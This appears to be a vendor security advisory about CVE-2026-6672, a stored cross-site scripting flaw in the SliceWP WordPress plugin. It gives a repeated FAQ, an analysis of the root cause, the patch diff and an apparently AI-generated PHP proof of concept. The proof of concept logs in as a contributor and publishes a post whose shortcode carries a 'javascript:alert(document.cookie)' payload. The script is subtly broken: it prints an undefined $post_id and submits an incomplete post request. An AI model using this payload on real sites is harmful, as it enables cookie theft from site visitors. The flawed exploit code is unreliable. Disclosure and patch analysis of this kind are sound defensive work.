What is CVE-2026-6672?

CVE-2026-6672 is a stored cross-site scripting (XSS) vulnerability in the SliceWP Affiliates plugin for WordPress. It allows authenticated users with contributor-level access or higher to inject arbitrary JavaScript into pages via the ‘slicewp_affiliate_url’ shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes in the shortcode. An attacker can insert a malicious payload in the ‘url’ attribute, which is then stored and executed when a user accesses the affected page.

Who is affected by this vulnerability?

All users of the SliceWP Affiliates plugin versions up to and including 1.2.7 are affected. This includes any authenticated user with contributor-level access or higher who can create or edit posts containing the vulnerable shortcode.

How can I check if my site is vulnerable?

Check the version of the SliceWP Affiliates plugin installed on your WordPress site. If it is version 1.2.7 or earlier, your site is vulnerable. You can find the version in the WordPress admin dashboard under Plugins.

How can I fix this vulnerability?

The vulnerability is patched in version 1.2.8 of the SliceWP Affiliates plugin. Update your plugin to this version or later to ensure that the input sanitization and output escaping are correctly applied.

What does a CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. In practical terms, this means that while the vulnerability requires authenticated access to exploit, it can still lead to significant security risks, such as data theft or site defacement.

What are the risks associated with this vulnerability?

Successful exploitation of this vulnerability can allow attackers to inject arbitrary JavaScript, leading to session hijacking, credential theft, or redirection to malicious sites. This can compromise the integrity of the site and affect all users visiting the compromised page.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker with contributor access can log into a WordPress site and create a post with a malicious shortcode. This illustrates the ease of exploitation and the potential impact of the vulnerability.

What steps should I take after updating the plugin?

After updating to version 1.2.8, review your site’s content for any existing shortcodes using the ‘slicewp_affiliate_url’ to ensure they do not contain malicious payloads. Additionally, monitor user activity and access logs for any suspicious behavior.

Is there any additional protection I should consider?

In addition to updating the plugin, consider implementing security measures such as a web application firewall, regular security audits, and user role management to limit access to trusted users only.

Where can I find more information about this vulnerability?

More information can be found on the official CVE database, security blogs, and the SliceWP plugin documentation. Keeping abreast of security advisories and updates is essential for maintaining a secure WordPress environment.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 5, 2026

CVE-2026-6672: Affiliate Program Suite <= 1.2.7 – Authenticated (Contributor+) Stored Cross-Site Scripting via slicewp_affiliate_url Shortcode (slicewp)

CVE ID CVE-2026-6672

Plugin slicewp

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.2.7

Patched Version 1.2.8

Disclosed May 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6672: This vulnerability is a stored cross-site scripting (XSS) flaw in the SliceWP Affiliates plugin for WordPress. Affected versions are up to and including 1.2.7. The flaw exists in the ‘slicewp_affiliate_url’ shortcode. Authenticated users with contributor-level access or higher can inject arbitrary web scripts. The CVSS score is 6.4, indicating a medium severity issue.

The root cause is insufficient input sanitization and output escaping on user-supplied attributes within the ‘slicewp_affiliate_url’ shortcode. The vulnerable code resides in the file /includes/users/shortcodes/functions-shortcodes.php. The function builds an affiliate URL using the ‘affiliate_id’ and ‘url’ attributes from the shortcode. The original code at line 485 returns the raw URL directly: ‘return ( ! is_null( $affiliate_url ) ? $affiliate_url : ” );’. There is no escaping before the output is sent to the browser.

An attacker with contributor-level access can create a post or page and insert the shortcode with a malicious payload in the ‘url’ attribute. For example, the shortcode ‘ [slicewp_affiliate_url affiliate_id=”1″ url=”javascript:alert(1)”] ‘ would render a link with a ‘javascript:’ URI scheme. When a user clicks the affiliate link, the injected JavaScript executes. The attack vector is through the WordPress post/page editor. No additional special endpoints are required. The payload is stored in the database and executed when the page containing the shortcode is loaded or the link is clicked.

The patch in version 1.2.8 introduces the ‘esc_url()’ function to escape the affiliate URL before output. The change is on line 485 of functions-shortcodes.php, modifying the return statement from ‘return ( ! is_null( $affiliate_url ) ? $affiliate_url : ” );’ to ‘return ( ! is_null( $affiliate_url ) ? esc_url( $affiliate_url ) : ” );’. The ‘esc_url()’ function strips dangerous URI schemes like ‘javascript:’ and encodes special characters, preventing script injection.

Successful exploitation allows authenticated attackers with contributor-level access to inject arbitrary JavaScript into WordPress pages. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The injected script executes when any user visits the compromised page. This has a direct impact on site visitors and can compromise the integrity of the WordPress installation.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/slicewp/includes/users/shortcodes/functions-shortcodes.php
+++ b/slicewp/includes/users/shortcodes/functions-shortcodes.php
@@ -482,6 +482,6 @@
     // Get the affiliate's URL.
     $affiliate_url = slicewp_get_affiliate_url( absint( $atts['affiliate_id'] ), $atts['url'] );

-    return ( ! is_null( $affiliate_url ) ? $affiliate_url : '' );
+    return ( ! is_null( $affiliate_url ) ? esc_url( $affiliate_url ) : '' );

 }
 No newline at end of file
--- a/slicewp/index.php
+++ b/slicewp/index.php
@@ -3,7 +3,7 @@
  * Plugin Name: SliceWP
  * Plugin URI: https://slicewp.com/
  * Description: The fastest and easiest way to set up an affiliate program for your store or membership site.
- * Version: 1.2.7
+ * Version: 1.2.8
  * Author: SliceWP
  * Author URI: https://slicewp.com/
  * Text Domain: slicewp
@@ -103,7 +103,7 @@
 	public function __construct() {

 		// Defining constants.
-		define( 'SLICEWP_VERSION', 		   '1.2.7' );
+		define( 'SLICEWP_VERSION', 		   '1.2.8' );
 		define( 'SLICEWP_BASENAME',  	   plugin_basename( __FILE__ ) );
 		define( 'SLICEWP_PLUGIN_DIR', 	   plugin_dir_path( __FILE__ ) );
 		define( 'SLICEWP_PLUGIN_DIR_URL',  plugin_dir_url( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6672 - Affiliate Program Suite <= 1.2.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via slicewp_affiliate_url Shortcode

$target_url = 'http://example.com'; // Change to the target WordPress site URL
$username = 'contributor'; // Change to a valid contributor username
$password = 'password'; // Change to the user's password
$post_content = '[slicewp_affiliate_url affiliate_id="1" url="javascript:alert(document.cookie)"]';
// This shortcode will render a link that executes JavaScript when clicked.

// Login to WordPress
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/') . '&testcookie=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);

// Create a new post with the malicious shortcode
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);

// Extract _wpnonce for post creation
preg_match('/<input type="hidden" id="_wpnonce" name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';
$post_title = 'XSS Test Post ' . time();

// Submit the post with the vulnerable shortcode
$post_data = array(
    '_wpnonce' => $nonce,
    'post_title' => $post_title,
    'content' => $post_content,
    'post_status' => 'publish',
    'post_type' => 'post',
);

$post_url = $target_url . '/wp-admin/post.php';
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);

echo "Post created. View it at: " . $target_url . "/?p=" . $post_id . "n";
echo "The post contains a link that triggers XSS when clicked.n";
curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-6672?
Understanding the vulnerability
CVE-2026-6672 is a stored cross-site scripting (XSS) vulnerability in the SliceWP Affiliates plugin for WordPress. It allows authenticated users with contributor-level access or higher to inject arbitrary JavaScript into pages via the ‘slicewp_affiliate_url’ shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes in the shortcode. An attacker can insert a malicious payload in the ‘url’ attribute, which is then stored and executed when a user accesses the affected page.
Who is affected by this vulnerability?
Identifying impacted users
All users of the SliceWP Affiliates plugin versions up to and including 1.2.7 are affected. This includes any authenticated user with contributor-level access or higher who can create or edit posts containing the vulnerable shortcode.
How can I check if my site is vulnerable?
Assessing your WordPress installation
Check the version of the SliceWP Affiliates plugin installed on your WordPress site. If it is version 1.2.7 or earlier, your site is vulnerable. You can find the version in the WordPress admin dashboard under Plugins.
How can I fix this vulnerability?
Steps to mitigate the issue
The vulnerability is patched in version 1.2.8 of the SliceWP Affiliates plugin. Update your plugin to this version or later to ensure that the input sanitization and output escaping are correctly applied.
What does a CVSS score of 6.4 mean?
Understanding severity levels
A CVSS score of 6.4 indicates a medium severity vulnerability. In practical terms, this means that while the vulnerability requires authenticated access to exploit, it can still lead to significant security risks, such as data theft or site defacement.
What are the risks associated with this vulnerability?
Potential consequences
Successful exploitation of this vulnerability can allow attackers to inject arbitrary JavaScript, leading to session hijacking, credential theft, or redirection to malicious sites. This can compromise the integrity of the site and affect all users visiting the compromised page.
How does the proof of concept demonstrate the issue?
Understanding the demonstration
The proof of concept provided shows how an attacker with contributor access can log into a WordPress site and create a post with a malicious shortcode. This illustrates the ease of exploitation and the potential impact of the vulnerability.
What steps should I take after updating the plugin?
Post-update best practices
After updating to version 1.2.8, review your site’s content for any existing shortcodes using the ‘slicewp_affiliate_url’ to ensure they do not contain malicious payloads. Additionally, monitor user activity and access logs for any suspicious behavior.
Is there any additional protection I should consider?
Enhancing site security
In addition to updating the plugin, consider implementing security measures such as a web application firewall, regular security audits, and user role management to limit access to trusted users only.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found on the official CVE database, security blogs, and the SliceWP plugin documentation. Keeping abreast of security advisories and updates is essential for maintaining a secure WordPress environment.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations